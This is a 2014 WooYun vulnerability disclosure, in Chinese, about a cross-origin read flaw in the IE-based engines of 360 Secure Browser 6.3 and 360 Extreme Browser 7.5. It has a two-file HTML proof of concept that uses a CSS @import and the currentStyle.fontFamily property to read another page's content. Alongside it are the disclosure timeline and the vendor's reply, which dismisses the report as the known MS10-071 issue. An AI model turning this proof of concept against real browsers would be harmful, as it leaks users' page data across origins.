当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-067448

漏洞标题:360最新版安全浏览器6.3、极速浏览器7.5及以下版本存在跨域漏洞

相关厂商:奇虎360

漏洞作者: 从容

提交时间:2014-07-04 22:20

修复时间:2014-09-29 22:22

公开时间:2014-09-29 22:22

漏洞类型:非授权访问/认证绕过

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-07-04: 细节已通知厂商并且等待厂商处理中
2014-07-04: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-08-28: 细节向核心白帽子及相关领域专家公开
2014-09-07: 细节向普通白帽子公开
2014-09-17: 细节向实习白帽子公开
2014-09-29: 细节向公众公开

简要描述:

360安全浏览器、极速浏览器最新版及以下版本都存在跨域漏洞
浏览器安全的基础就是同源策略
重点其实在"漏洞修复"那一栏里
大爱乌云!乌云万岁!

详细说明:

下载360安全浏览器最新版6.3和极速浏览器最新版7.5

http://se.360.cn/
http://chrome.360.cn/


360安全浏览器和极速浏览器一直都是都是基于IE内核的浏览器
问题发生在CSS Parse的过程中,将fontFamily后面的内容当做了value属性,从而就可以实现跨域

漏洞证明:

先写两个测试的POC:
test1.html

<html>
<head>
<title>test1</title>
</head>
<body>
{}body{font-family:
WooYun
</body>
</html>


test2.html

<html>

<head>
<title>test2</title>
</head>
<body>
<style>
@import url("C:\Users\Administrator\Desktop\test1.html");
</style>
<script>
setTimeout(function(){
var t = document.body.currentStyle.fontFamily;
alert(t);
},2000);
</script>
</body>
</html>


360安全浏览器最新版6.3下测试:
用360安全浏览器6.3访问test2.html
但是要设为IE兼容模式

QQ截图20140704215647.png


弹弹弹....

QQ截图20140704213938.png


极速浏览器最新版7.5下测试:
这两个模式下哪个都可以~

QQ截图20140704214809.png


接着弹弹弹~

QQ截图20140704214741.png


这两个浏览器的所有版本都有这个问题,不信你们试试...
在test2.html 中通过@import加载了 test.html 为CSS文件,渲染进入当前DOM,同时通过 document.body.currentStyle.fontFamily 访问此内容,问题发生在CSS Parse的过程中,将fontFamily后面的内容当做了value,从而读出了test1.html的页面内容.

修复方案:

在次先请让我吐个槽,多谢!
我上次提交的360安全浏览器5.0版本,那个时候是最新版,你不是说从5.0版本停止更新了么,有图有真相

QQ截图20140704212427.png


你还说推荐用户使用360极速浏览器,可我发现极速浏览器也照样有这个问题啊,而且还是最新版!
我可没有什么意思,我也不是为了几个wb提交写这一堆废话,只是觉得学生党提交几个漏洞也不容易,你别说忽略就忽略啊.
就算忽略了也可以,但你们倒是付出实际行动啊,行,就算你接着更新了,但起码不在用IE8内核了也行啊,不是什么用户都会打系统补丁.
一群大妈用360"安全浏览器"或者"极速浏览器"在网购,然后被恶意劫持了,理论上跟360没什么关系,但是用户对360的信任也就没了....
请原谅我这些废话,并无恶意,还望360安全高管们重视我们这群小白提交的漏洞,或许有一天会因为"不在乎"而出现"大麻烦"!

版权声明:转载请注明来源 从容@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-09-29 22:22

厂商回复:

您好,您提交的不是安全漏洞,在本地域打开的网页是有此类权限的。
另您提供的代码是微软MS10-071漏洞的代码,打上微软补丁后,可以修复。
参考http:///vulndb/

最新状态:

暂无